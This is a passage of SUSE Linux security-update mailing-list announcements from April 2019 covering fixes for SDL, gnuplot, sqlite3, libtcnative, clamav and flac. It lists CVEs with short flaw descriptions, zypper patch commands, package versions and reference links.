Announcement ID: SUSE-SU-2019:0899-1 Rating: moderate References: #1124799 #1124800 #1124802 #1124803 #1124805 #1124806 #1124824 #1124825 #1124826 #1124827 #1125099 Cross-References: CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes 11 vulnerabilities is now available. 
Description:

   This update for SDL fixes the following issues:

   Security issues fixed:

   - CVE-2019-7572: Fixed a buffer over-read in IMA_ADPCM_nibble in
     audio/SDL_wave.c (bsc#1124806).
   - CVE-2019-7578: Fixed a heap-based buffer over-read in InitIMA_ADPCM in
     audio/SDL_wave.c (bsc#1125099).
   - CVE-2019-7576: Fixed a heap-based buffer over-read in InitMS_ADPCM in
     audio/SDL_wave.c (bsc#1124799).
   - CVE-2019-7573: Fixed a heap-based buffer over-read in InitMS_ADPCM in
     audio/SDL_wave.c (bsc#1124805).
   - CVE-2019-7635: Fixed a heap-based buffer over-read in Blit1to4 in
     video/SDL_blit_1.c (bsc#1124827).
   - CVE-2019-7636: Fixed a heap-based buffer over-read in SDL_GetRGB in
     video/SDL_pixels.c (bsc#1124826).
   - CVE-2019-7638: Fixed a heap-based buffer over-read in Map1toN in
     video/SDL_pixels.c (bsc#1124824).
   - CVE-2019-7574: Fixed a heap-based buffer over-read in IMA_ADPCM_decode in
     audio/SDL_wave.c (bsc#1124803).
   - CVE-2019-7575: Fixed a heap-based buffer overflow in MS_ADPCM_decode in
     audio/SDL_wave.c (bsc#1124802).
   - CVE-2019-7637: Fixed a heap-based buffer overflow in the SDL_FillRect
     function in SDL_surface.c (bsc#1124825).
   - CVE-2019-7577: Fixed a buffer over-read in SDL_LoadWAV_RW in
     audio/SDL_wave.c (bsc#1124800).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 12-SP4:

      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-899=1

   - SUSE Linux Enterprise Software Development Kit 12-SP3:

      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-899=1

   - SUSE Linux Enterprise Server 12-SP4:

      zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-899=1

   - SUSE Linux Enterprise Server 12-SP3:

      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-899=1

   - SUSE Linux Enterprise Desktop 12-SP4:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-899=1

   - SUSE Linux Enterprise Desktop 12-SP3:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-899=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

      SDL-debugsource-1.2.15-15.11.1
      libSDL-devel-1.2.15-15.11.1

   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

      SDL-debugsource-1.2.15-15.11.1
      libSDL-devel-1.2.15-15.11.1

   - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

      SDL-debugsource-1.2.15-15.11.1
      libSDL-1_2-0-1.2.15-15.11.1
      libSDL-1_2-0-debuginfo-1.2.15-15.11.1

   - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64):

      libSDL-1_2-0-32bit-1.2.15-15.11.1
      libSDL-1_2-0-debuginfo-32bit-1.2.15-15.11.1

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

      SDL-debugsource-1.2.15-15.11.1
      libSDL-1_2-0-1.2.15-15.11.1
      libSDL-1_2-0-debuginfo-1.2.15-15.11.1

   - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64):

      libSDL-1_2-0-32bit-1.2.15-15.11.1
      libSDL-1_2-0-debuginfo-32bit-1.2.15-15.11.1

   - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

      SDL-debugsource-1.2.15-15.11.1
      libSDL-1_2-0-1.2.15-15.11.1
      libSDL-1_2-0-debuginfo-1.2.15-15.11.1

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

      SDL-debugsource-1.2.15-15.11.1
      libSDL-1_2-0-1.2.15-15.11.1
      libSDL-1_2-0-debuginfo-1.2.15-15.11.1

References:

   https://www.suse.com/security/cve/CVE-2019-7572.html
   https://www.suse.com/security/cve/CVE-2019-7573.html
   https://www.suse.com/security/cve/CVE-2019-7574.html
   https://www.suse.com/security/cve/CVE-2019-7575.html
   https://www.suse.com/security/cve/CVE-2019-7576.html
   https://www.suse.com/security/cve/CVE-2019-7577.html
   https://www.suse.com/security/cve/CVE-2019-7578.html
   https://www.suse.com/security/cve/CVE-2019-7635.html
   https://www.suse.com/security/cve/CVE-2019-7636.html
   https://www.suse.com/security/cve/CVE-2019-7637.html
   https://www.suse.com/security/cve/CVE-2019-7638.html
   https://bugzilla.suse.com/1124799
   https://bugzilla.suse.com/1124800
   https://bugzilla.suse.com/1124802
   https://bugzilla.suse.com/1124803
   https://bugzilla.suse.com/1124805
   https://bugzilla.suse.com/1124806
   https://bugzilla.suse.com/1124824
   https://bugzilla.suse.com/1124825
   https://bugzilla.suse.com/1124826
   https://bugzilla.suse.com/1124827
   https://bugzilla.suse.com/1125099

From sle-security-updates at lists.suse.com  Mon Apr  8 13:09:48 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 8 Apr 2019 21:09:48 +0200 (CEST)
Subject: SUSE-SU-2019:0904-1: moderate: Security update for gnuplot
Message-ID: <20190408190948.6ED92FF2D@maintenance.suse.de>

   SUSE Security Update: Security update for gnuplot
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0904-1
Rating:             moderate
References:         #1117463 #1117464 #1117465
Cross-References:   CVE-2018-19490 CVE-2018-19491 CVE-2018-19492
Affected Products:
                    SUSE Linux Enterprise Module for Server Applications 15
______________________________________________________________________________

   An update that fixes three vulnerabilities is now available.
Description:

   This update for gnuplot fixes the following issues:

   Security issues fixed:

   - CVE-2018-19492: Fixed a buffer overflow in the cairotrm_options function
     (bsc#1117463).
   - CVE-2018-19491: Fixed a buffer overflow in the PS_options function
     (bsc#1117464).
   - CVE-2018-19490: Fixed a heap-based buffer overflow in the
     df_generate_ascii_array_entry function (bsc#1117465).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Server Applications 15:

      zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-904=1

Package List:

   - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64):

      gnuplot-5.2.2-3.3.29
      gnuplot-debuginfo-5.2.2-3.3.29
      gnuplot-debugsource-5.2.2-3.3.29

   - SUSE Linux Enterprise Module for Server Applications 15 (noarch):

      gnuplot-doc-5.2.2-3.3.29

References:

   https://www.suse.com/security/cve/CVE-2018-19490.html
   https://www.suse.com/security/cve/CVE-2018-19491.html
   https://www.suse.com/security/cve/CVE-2018-19492.html
   https://bugzilla.suse.com/1117463
   https://bugzilla.suse.com/1117464
   https://bugzilla.suse.com/1117465

From sle-security-updates at lists.suse.com  Tue Apr  9 07:09:51 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 9 Apr 2019 15:09:51 +0200 (CEST)
Subject: SUSE-SU-2019:0913-1: moderate: Security update for sqlite3
Message-ID: <20190409130951.45A7B1012C@maintenance.suse.de>

   SUSE Security Update: Security update for sqlite3
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0913-1
Rating:             moderate
References:         #1119687 #1131576
Cross-References:   CVE-2018-20346 CVE-2018-20506
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 4
                    SUSE CaaS Platform ALL
                    SUSE CaaS Platform 3.0
                    OpenStack Cloud Magnum Orchestration 7
______________________________________________________________________________

   An update that fixes two vulnerabilities is now available.

Description:

   This update for sqlite3 fixes the following issues:

   Security issues fixed:

   - CVE-2018-20346: Fixed a remote code execution vulnerability in FTS3
     (Magellan) (bsc#1119687).
   - CVE-2018-20506: Fixed an integer overflow when FTS3 extension is enabled
     (bsc#1131576).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE OpenStack Cloud 7:

      zypper in -t patch SUSE-OpenStack-Cloud-7-2019-913=1

   - SUSE Linux Enterprise Software Development Kit 12-SP4:

      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-913=1

   - SUSE Linux Enterprise Software Development Kit 12-SP3:

      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-913=1

   - SUSE Linux Enterprise Server for SAP 12-SP2:

      zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-913=1

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-913=1

   - SUSE Linux Enterprise Server 12-SP4:

      zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-913=1

   - SUSE Linux Enterprise Server 12-SP3:

      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-913=1

   - SUSE Linux Enterprise Server 12-SP2-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-913=1

   - SUSE Linux Enterprise Server 12-SP2-BCL:

      zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-913=1

   - SUSE Linux Enterprise Server 12-SP1-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-913=1

   - SUSE Linux Enterprise Desktop 12-SP4:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-913=1

   - SUSE Linux Enterprise Desktop 12-SP3:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-913=1

   - SUSE Enterprise Storage 4:

      zypper in -t patch SUSE-Storage-4-2019-913=1

   - SUSE CaaS Platform ALL:

      To install this update, use the SUSE CaaS Platform Velum dashboard. It
      will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.

   - SUSE CaaS Platform 3.0:

      To install this update, use the SUSE CaaS Platform Velum dashboard. It
      will inform you if it detects new updates and let you then trigger
      updating of the complete cluster in a controlled way.

   - OpenStack Cloud Magnum Orchestration 7:

      zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-913=1

Package List:

   - SUSE OpenStack Cloud 7 (s390x x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1
      sqlite3-devel-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1
      sqlite3-devel-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64):

      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64):

      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64):

      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP2-LTSS (s390x x86_64):

      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64):

      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE Enterprise Storage 4 (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-32bit-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1
      sqlite3-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE CaaS Platform ALL (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - SUSE CaaS Platform 3.0 (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

   - OpenStack Cloud Magnum Orchestration 7 (x86_64):

      libsqlite3-0-3.8.10.2-9.3.1
      libsqlite3-0-debuginfo-3.8.10.2-9.3.1
      sqlite3-debuginfo-3.8.10.2-9.3.1
      sqlite3-debugsource-3.8.10.2-9.3.1

References:

   https://www.suse.com/security/cve/CVE-2018-20346.html
   https://www.suse.com/security/cve/CVE-2018-20506.html
   https://bugzilla.suse.com/1119687
   https://bugzilla.suse.com/1131576

From sle-security-updates at lists.suse.com  Tue Apr  9 07:10:44 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 9 Apr 2019 15:10:44 +0200 (CEST)
Subject: SUSE-SU-2019:14014-1: important: Security update for libtcnative-1-0
Message-ID: <20190409131044.296071012B@maintenance.suse.de>

   SUSE Security Update: Security update for libtcnative-1-0
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14014-1
Rating:             important
References:         #1078679 #1103347 #1103348
Cross-References:   CVE-2017-15698 CVE-2018-8019 CVE-2018-8020
Affected Products:
                    SUSE Linux Enterprise Server 11-SP4-LTSS
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP4
                    SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

   An update that fixes three vulnerabilities is now available.

Description:

   This update for libtcnative-1-0 to version 1.1.34 fixes the following
   issues:

   - CVE-2017-15698: Fixed an improper handling of fields with more than 127
     bytes which could allow invalid client certificates to be accepted
     (bsc#1078679).
   - CVE-2018-8019: When using an OCSP responder, invalid responses were not
     correctly handled. This allowed revoked client certificates to be
     incorrectly identified. It was therefore possible for users to
     authenticate with revoked certificates when using mutual TLS
     (bsc#1103348).
   - CVE-2018-8020: OCSP pre-produced responses were not properly checked.
     Revoked client certificates may not have been properly identified,
     allowing users to authenticate with revoked certificates to connections
     that require mutual TLS (bsc#1103347).

   For a complete list of changes, please see
   http://tomcat.apache.org/native-1.1-doc/miscellaneous/changelog.html

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server 11-SP4-LTSS:

      zypper in -t patch slessp4-libtcnative-1-0-14014=1

   - SUSE Linux Enterprise Point of Sale 11-SP3:

      zypper in -t patch sleposp3-libtcnative-1-0-14014=1

   - SUSE Linux Enterprise Debuginfo 11-SP4:

      zypper in -t patch dbgsp4-libtcnative-1-0-14014=1

   - SUSE Linux Enterprise Debuginfo 11-SP3:

      zypper in -t patch dbgsp3-libtcnative-1-0-14014=1

Package List:

   - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):

      libtcnative-1-0-1.3.4-12.5.5.2

   - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

      libtcnative-1-0-1.3.4-12.5.5.2

   - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):

      libtcnative-1-0-debuginfo-1.3.4-12.5.5.2
      libtcnative-1-0-debugsource-1.3.4-12.5.5.2

   - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):

      libtcnative-1-0-debuginfo-1.3.4-12.5.5.2
      libtcnative-1-0-debugsource-1.3.4-12.5.5.2

References:

   https://www.suse.com/security/cve/CVE-2017-15698.html
   https://www.suse.com/security/cve/CVE-2018-8019.html
   https://www.suse.com/security/cve/CVE-2018-8020.html
   https://bugzilla.suse.com/1078679
   https://bugzilla.suse.com/1103347
   https://bugzilla.suse.com/1103348
From sle-security-updates at lists.suse.com  Tue Apr  9 10:10:19 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 9 Apr 2019 18:10:19 +0200 (CEST)
Subject: SUSE-SU-2019:14015-1: important: Security update for clamav
Message-ID: <20190409161019.BD205FF2D@maintenance.suse.de>

   SUSE Security Update: Security update for clamav
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14015-1
Rating:             important
References:         #1130721
Cross-References:   CVE-2019-1787 CVE-2019-1788 CVE-2019-1789
Affected Products:
                    SUSE Linux Enterprise Server 11-SP4-LTSS
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP4
                    SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

   An update that fixes three vulnerabilities is now available.

Description:

   This update for clamav to version 0.100.3 fixes the following issues:

   Security issues fixed (bsc#1130721):

   - CVE-2019-1787: Fixed an out-of-bounds heap read condition which may occur
     when scanning PDF documents.
   - CVE-2019-1789: Fixed an out-of-bounds heap read condition which may occur
     when scanning PE files (i.e. Windows EXE and DLL files).
   - CVE-2019-1788: Fixed an out-of-bounds heap write condition which may occur
     when scanning OLE2 files such as Microsoft Office 97-2003 documents.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server 11-SP4-LTSS:

      zypper in -t patch slessp4-clamav-14015=1

   - SUSE Linux Enterprise Point of Sale 11-SP3:

      zypper in -t patch sleposp3-clamav-14015=1

   - SUSE Linux Enterprise Debuginfo 11-SP4:

      zypper in -t patch dbgsp4-clamav-14015=1

   - SUSE Linux Enterprise Debuginfo 11-SP3:

      zypper in -t patch dbgsp3-clamav-14015=1

Package List:

   - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):

      clamav-0.100.3-0.20.21.1

   - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):

      clamav-0.100.3-0.20.21.1

   - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):

      clamav-debuginfo-0.100.3-0.20.21.1
      clamav-debugsource-0.100.3-0.20.21.1

   - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):

      clamav-debuginfo-0.100.3-0.20.21.1
      clamav-debugsource-0.100.3-0.20.21.1

References:

   https://www.suse.com/security/cve/CVE-2019-1787.html
   https://www.suse.com/security/cve/CVE-2019-1788.html
   https://www.suse.com/security/cve/CVE-2019-1789.html
   https://bugzilla.suse.com/1130721

From sle-security-updates at lists.suse.com  Tue Apr  9 13:09:31 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 9 Apr 2019 21:09:31 +0200 (CEST)
Subject: SUSE-SU-2019:0920-1: Security update for flac
Message-ID: <20190409190931.70D83F7BB@maintenance.suse.de>

   SUSE Security Update: Security update for flac
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0920-1
Rating:             low
References:         #1091045
Cross-References:   CVE-2017-6888
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for flac fixes the following issues:

   - CVE-2017-6888: An error in the "read_metadata_vorbiscomment_()" function
     could be exploited to cause a memory leak via a specially crafted FLAC
     file (bsc#1091045).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:

      zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-920=1

   - SUSE Linux Enterprise Module for Basesystem 15:

      zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-920=1

Package List:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):

      flac-1.3.2-3.3.20
      flac-debuginfo-1.3.2-3.3.20
      flac-debugsource-1.3.2-3.3.20

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch):

      flac-doc-1.3.2-3.3.20

   - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

      flac-debuginfo-1.3.2-3.3.20
      flac-debugsource-1.3.2-3.3.20
      flac-devel-1.3.2-3.3.20
      libFLAC++6-1.3.2-3.3.20
      libFLAC++6-debuginfo-1.3.2-3.3.20
      libFLAC8-1.3.2-3.3.20
      libFLAC8-debuginfo-1.3.2-3.3.20

References:

   https://www.suse.com/security/cve/CVE-2017-6888.html
   https://bugzilla.suse.com/1091045

From sle-security-updates at lists.suse.com  Tue Apr  9 13:10:38 2019
From:
sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 9 Apr 2019 21:10:38 +0200 (CEST)
Subject: SUSE-SU-2019:0917-1: moderate: Security update for SDL
Message-ID: <20190409191038.23ECBF7BB@maintenance.suse.de>

   SUSE Security Update: Security update for SDL
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0917-1
Rating:             moderate
References:         #1124799 #1124800 #1124802 #1124803 #1124805 #1124806
                    #1124824 #1124825 #1124826 #1124827 #1125099
Cross-References:   CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575
                    CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635
                    CVE-2019-7636 CVE-2019-7637 CVE-2019-7638
Affected Products:
                    SUSE Linux Enterprise Module for Desktop Applications 15
______________________________________________________________________________

   An update that fixes 11 vulnerabilities is now available.

Description:

   This update for SDL fixes the following issues:

   Security issues fixed:

   - CVE-2019-7572: Fixed a buffer over-read in IMA_ADPCM_nibble in
     audio/SDL_wave.c (bsc#1124806).
   - CVE-2019-7578: Fixed a heap-based buffer over-read in InitIMA_ADPCM in
     audio/SDL_wave.c (bsc#1125099).
   - CVE-2019-7576: Fixed a heap-based buffer over-read in InitMS_ADPCM in
     audio/SDL_wave.c (bsc#1124799).
   - CVE-2019-7573: Fixed a heap-based buffer over-read in InitMS_ADPCM in
     audio/SDL_wave.c (bsc#1124805).
   - CVE-2019-7635: Fixed a heap-based buffer over-read in Blit1to4 in
     video/SDL_blit_1.c (bsc#1124827).
   - CVE-2019-7636: Fixed a heap-based buffer over-read in SDL_GetRGB in
     video/SDL_pixels.c (bsc#1124826).
   - CVE-2019-7638: Fixed a heap-based buffer over-read in Map1toN in
     video/SDL_pixels.c (bsc#1124824).
   - CVE-2019-7574: Fixed a heap-based buffer over-read in IMA_ADPCM_decode in
     audio/SDL_wave.c (bsc#1124803).
   - CVE-2019-7575: Fixed a heap-based buffer overflow in MS_ADPCM_decode in
     audio/SDL_wave.c (bsc#1124802).
   - CVE-2019-7637: Fixed a heap-based buffer overflow in the SDL_FillRect
     function in SDL_surface.c (bsc#1124825).
   - CVE-2019-7577: Fixed a buffer over-read in SDL_LoadWAV_RW in
     audio/SDL_wave.c (bsc#1124800).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Desktop Applications 15:

      zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-917=1

Package List:

   - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

      SDL-debugsource-1.2.15-3.9.1
      libSDL-1_2-0-1.2.15-3.9.1
      libSDL-1_2-0-debuginfo-1.2.15-3.9.1
      libSDL-devel-1.2.15-3.9.1

References:

   https://www.suse.com/security/cve/CVE-2019-7572.html
   https://www.suse.com/security/cve/CVE-2019-7573.html
   https://www.suse.com/security/cve/CVE-2019-7574.html
   https://www.suse.com/security/cve/CVE-2019-7575.html
   https://www.suse.com/security/cve/CVE-2019-7576.html
   https://www.suse.com/security/cve/CVE-2019-7577.html
   https://www.suse.com/security/cve/CVE-2019-7578.html
   https://www.suse.com/security/cve/CVE-2019-7635.html
   https://www.suse.com/security/cve/CVE-2019-7636.html
   https://www.suse.com/security/cve/CVE-2019-7637.html
   https://www.suse.com/security/cve/CVE-2019-7638.html
   https://bugzilla.suse.com/1124799
   https://bugzilla.suse.com/1124800
   https://bugzilla.suse.com/1124802
   https://bugzilla.suse.com/1124803
   https://bugzilla.suse.com/1124805
   https://bugzilla.suse.com/1124806
   https://bugzilla.suse.com/1124824
